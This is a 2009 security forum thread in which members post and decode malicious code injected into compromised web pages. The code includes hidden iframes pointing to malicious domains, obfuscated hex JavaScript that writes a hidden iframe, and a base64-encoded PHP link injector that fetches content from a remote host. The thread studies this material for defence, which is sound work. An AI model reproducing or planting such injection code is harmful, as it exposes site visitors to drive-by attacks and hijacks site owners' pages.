Author Topic: weird script for researchers...  (Read 3580 times)

0 Members and 1 Guest are viewing this topic.

September 13, 2009, 09:14:46 pm
Read 3580 times

cleanmx

  • Special Members
  • Hero Member

  • Offline
  • *

  • 3405
    • Spam-Filter Anti-Spam Virenschutz - CLEAN MX Managed Anti-Spam Service ist die Lösung für Ihr Spam-Problem
Code: [Select]
<iframe src="http://3f7.ru:8
<iframe rwlrl='kPaLvKn7' iwnvq='vwVE18tV' yrpli='YZMyHjlR' src='http://newsmeta.net/s/in.cgi?8 ' fcwku='v3KFiRhP' liuhf='kXJm0aa8' btmqh='xu
  <meta http-equiv="content-type"
<body style="background-image: url(brsostav200.JPG);"><script>c10ze25='';ya271e09=/* y16b29deb8 */document;ya271e09.write('<scr'+'ipt>function yc87feb6a9(ye
b482){return e'+c10ze25+'val(yeb482); }</scr'+'ipt>');  function c101e3f8acyf0aec(ya518412a){ function yd92cd8(){var y8b6913395=16;return y8b6913395;} var z
c8='';return (yc87feb6a9('p'+zc8+'arseInt')(ya518412a,yd92cd8()));}function ycf86d8(y52318d){ var y7ba103ed2=2; var y1490c='';y91f64a1='fromCh';y779890=Stri
ng[y91f64a1+'arCode'];for(y5310736=0;y5310736<y52318d.length;y5310736+=y7ba103ed2){ y1490c+=(y779890(c101e3f8acyf0aec(y52318d.substr(y5310736,y7ba103ed2))))
;}return y1490c;} var y787dd4f95='3C7363726970743E69662821'+c10ze25+'6D796961'+c10ze25+'297B646F63756D656E742E777269746528756E65736361'+c10ze25+'70652820272
53363253639253636253732253631'+c10ze25+'253664253635253230253665253631'+c10ze25+'253664253635253364253633253331'+c10ze25+'2533302532302537332537322536332533
64253237253638253734253734253730253361'+c10ze25+'25326625326625373325373425363525373025333225366425363525326525366525363525373425326625326525363425363925363
6253266253637253666253265253730253638253730253366253733253639253634253364253331'+c10ze25+'26253237253262253464253631'+c10ze25+'25373425363825326525373225366
6253735253665253634253238253464253631'+c10ze25+'253734253638253265253732253631'+c10ze25+'253665253634253666253664253238253239253261'+c10ze25+'25333325333525
3339253337253339253239253262253237253634253636253636253335253636253632253633253631'+c10ze25+'253339253635253336253632253237253230253737253639253634253734253
638253364253332253330253331'+c10ze25+'253230253638253635253639253637253638253734253364253331'+c10ze25+'25333725333925323025373325373425373925366325363525336
4253237253736253639253733253639253632253639253663253639253734253739253361'+c10ze25+'253638253639253634253634253635253665253237253365253363253266253639253636
253732253631'+c10ze25+'2536642536352533652729293B7D7661'+c10ze25+'72206D796961'+c10ze25+'3D747275653B3C2F7363726970743E';ya271e09.write(ycf86d8(y787dd4f95))
;</script><?eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGxpbmtzID0gbmV3IEdldExpbmtzKCk7DQoNCmVjaG8gJGxpbmtzLT5MaW5rczsNCmNsYXNzIEdldExpbmtzDQp7DQoJdmFy
ICRob3N0ID0gImVzbGkudHciOw0KCXZhciAkcGF0aCA9ICIvbGluay5waHA/c2l0ZT0iOw0KCXZhciAkc2l0ZSA9ICIiOw0KCXZhciAkdXNlcl9hZ2VudCA9ICIiOw0KDQoJdmFyICRMaW5rcyA9ICIiOw0K
DQoNCgl2YXIgJF9zb2NrZXRfdGltZW91dCAgICA9IDEyOw0KCXZhciAkX2Nhc2hlX2xpZmVfdGltZSAgICA9IDM2MDA7DQoJdmFyICRfY2FzaGVfZmlsZQkJCSAgICA9ICJjYXNoZS50eHQiOw0KDQoJZnVu
Y3Rpb24gR2V0TGlua3MoKQ0KCXsNCgkJaWYgKCFpc19maWxlKCR0aGlzLT5fY2FzaGVfZmlsZSkgfHwgKGZpbGVtdGltZSgkdGhpcy0+X2Nhc2hlX2ZpbGUpIDwgKHRpbWUoKS0kdGhpcy0+X2Nhc2hlX2xp
ZmVfdGltZSkpIHx8IGZpbGVzaXplKCR0aGlzLT5fY2FzaGVfZmlsZSkgPT0gMCkgew0KDQoJCQkkdGhpcy0+c2l0ZQkJCQk9IGlzc2V0KCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgPyAkX1NFUlZFUlsnSFRU
UF9IT1NUJ10gOiAkSFRUUF9TRVJWRVJfVkFSU1snSFRUUF9IT1NUJ107DQoJCQkkdGhpcy0+dXNlcl9hZ2VudCA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCgkJCQ0KCQkJJHRoaXMtPkxpbmtz
IAkJCT0gJHRoaXMtPmZldGNoX3JlbW90ZV9maWxlKCk7DQoJCQlpZiAoJGhhbmRsZSA9IGZvcGVuKCR0aGlzLT5fY2FzaGVfZmlsZSwgJ3cnKSkgew0KCQkJCWZ3cml0ZSgkaGFuZGxlLCAkdGhpcy0+TGlu
a3MpOw0KCQkJfQ0KDQoJCQlmY2xvc2UoJGhhbmRsZSk7DQoJCX0NCgkJZWxzZSB7DQoJCQkkdGhpcy0+TGlua3MgPSBmaWxlX2dldF9jb250ZW50cygkdGhpcy0+X2Nhc2hlX2ZpbGUpOw0KCQl9DQoJfQ0K
DQoJZnVuY3Rpb24gZmV0Y2hfcmVtb3RlX2ZpbGUoKQ0KCXsNCgkgICRidWZmID0gJyc7DQogICAgJGZwID0gZnNvY2tvcGVuKCR0aGlzLT5ob3N0LCA4MCwgJGVycm5vLCAkZXJyc3RyLCAkdGhpcy0+X3Nv
Y2tldF90aW1lb3V0KTsNCiAgICBpZiAoISRmcCkgew0KDQogICAgfSBlbHNlIHsNCiAgICAgICAgJG91dCA9ICJHRVQgeyR0aGlzLT5wYXRofXskdGhpcy0+c2l0ZX0gSFRUUC8xLjFcclxuIjsNCiAgICAg
ICAgJG91dCAuPSAiSG9zdDogeyR0aGlzLT5ob3N0fVxyXG4iOw0KICAgICAgICAkb3V0IC49ICJDb25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIjsNCiAgICANCiAgICAgICAgZndyaXRlKCRmcCwgJG91dCk7
DQogICAgICAgIHdoaWxlICghZmVvZigkZnApKSB7DQogICAgICAgICAgICAkYnVmZiAuPSBmZ2V0cygkZnAsIDEyOCk7DQogICAgICAgIH0NCiAgICAgICAgZmNsb3NlKCRmcCk7DQogIAkJCSRwYWdlID0g
ZXhwbG9kZSgiXHJcblxyXG4iLCAkYnVmZik7DQogIAkJCXJldHVybiAkcGFnZVsxXTsNCiAgICB9DQoJfQ0KfQ=='));?><!-- o65 --><!-- c65 -->
 href="http://www.borodinsky.net">El pan de Borodin&#243;</a> - uno de las
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <td><a href="http://www.arteadentro.com.ar/ecole/index.html" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r1_c1','','index_r1_c1_f2
.jpg',1);"><img name="index_r1_c1" src="index_r1_c1.jpg" width="279" height="323" border="0" alt=""></a></td>
   <td rowspan="2"><a href="http://www.arteadentro.com.ar/arteadentroo/index.htm" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r1_c2',
'','index_r1_c2_f2.jpg',1);"><img name="index_r1_c2" src="index_r1_c2.jpg" width="421" height="500" border="0" alt=""></a></td>
   <td><a href="http://www.arteadentro.com.ar/anahi/index.htm" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r2_c1','','index_r2_c1_f2.
jpg',1);"><img name="index_r2_c1" src="index_r2_c1.jpg" width="279" height="177" border="0" alt=""></a></td>

September 13, 2009, 10:36:05 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
multiple parts


starts with an incomplete iframe
Code: [Select]
<iframe src="http://3f7.ru:8which probably is
Code: [Select]
<iframe src="http://3f7.ru:8080>
another iframe
Code: [Select]
<iframe rwlrl='kPaLvKn7' iwnvq='vwVE18tV' yrpli='YZMyHjlR' src='http://newsmeta.net/s/in.cgi?8 ' fcwku='v3KFiRhP' liuhf='kXJm0aa8' btmqh='xu
  <meta http-equiv="content-type"
<body style="background-image: url(brsostav200.JPG);">

script from "c10ze25=''" to "ya271e09.write(ycf86d8(y787dd4f95));</script>" decodes to
Code: [Select]
<iframe name=c10 src='http://step2me.net/.dif/go.php?sid=1&'+Math.round(Math.random()*35979)+'dff5fbca9e6b' width=201 height=179 style='visibility:hidden'></iframe>
the eval(base64_decode) section
Code: [Select]
error_reporting(0);
$links = new GetLinks();

echo $links->Links;
class GetLinks
{
var $host = "esli.tw";
var $path = "/link.php?site=";
var $site = "";
var $user_agent = "";

var $Links = "";


var $_socket_timeout    = 12;
var $_cashe_life_time    = 3600;
var $_cashe_file     = "cashe.txt";

function GetLinks()
{
if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
$this->user_agent = $_SERVER['HTTP_USER_AGENT'];

$this->Links = $this->fetch_remote_file();
if ($handle = fopen($this->_cashe_file, 'w')) {
fwrite($handle, $this->Links);
}

fclose($handle);
}
else {
$this->Links = file_get_contents($this->_cashe_file);
}
}

function fetch_remote_file()
{
  $buff = '';
    $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
    if (!$fp) {

    } else {
        $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
        $out .= "Host: {$this->host}\r\n";
        $out .= "Connection: Close\r\n\r\n";
   
        fwrite($fp, $out);
        while (!feof($fp)) {
            $buff .= fgets($fp, 128);
        }
        fclose($fp);
  $page = explode("\r\n\r\n", $buff);
  return $page[1];
    }
}
}

rest
Code: [Select]
href="http://www.borodinsky.net">El pan de Borodin&#243;</a> - uno de las
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <td><a href="http://www.arteadentro.com.ar/ecole/index.html" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r1_c1','','index_r1_c1_f2
.jpg',1);"><img name="index_r1_c1" src="index_r1_c1.jpg" width="279" height="323" border="0" alt=""></a></td>
   <td rowspan="2"><a href="http://www.arteadentro.com.ar/arteadentroo/index.htm" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r1_c2',
'','index_r1_c2_f2.jpg',1);"><img name="index_r1_c2" src="index_r1_c2.jpg" width="421" height="500" border="0" alt=""></a></td>
   <td><a href="http://www.arteadentro.com.ar/anahi/index.htm" onMouseOut="MM_swapImgRestore();" onMouseOver="MM_swapImage('index_r2_c1','','index_r2_c1_f2.
jpg',1);"><img name="index_r2_c1" src="index_r2_c1.jpg" width="279" height="177" border="0" alt=""></a></td>
Ruining the bad guy's day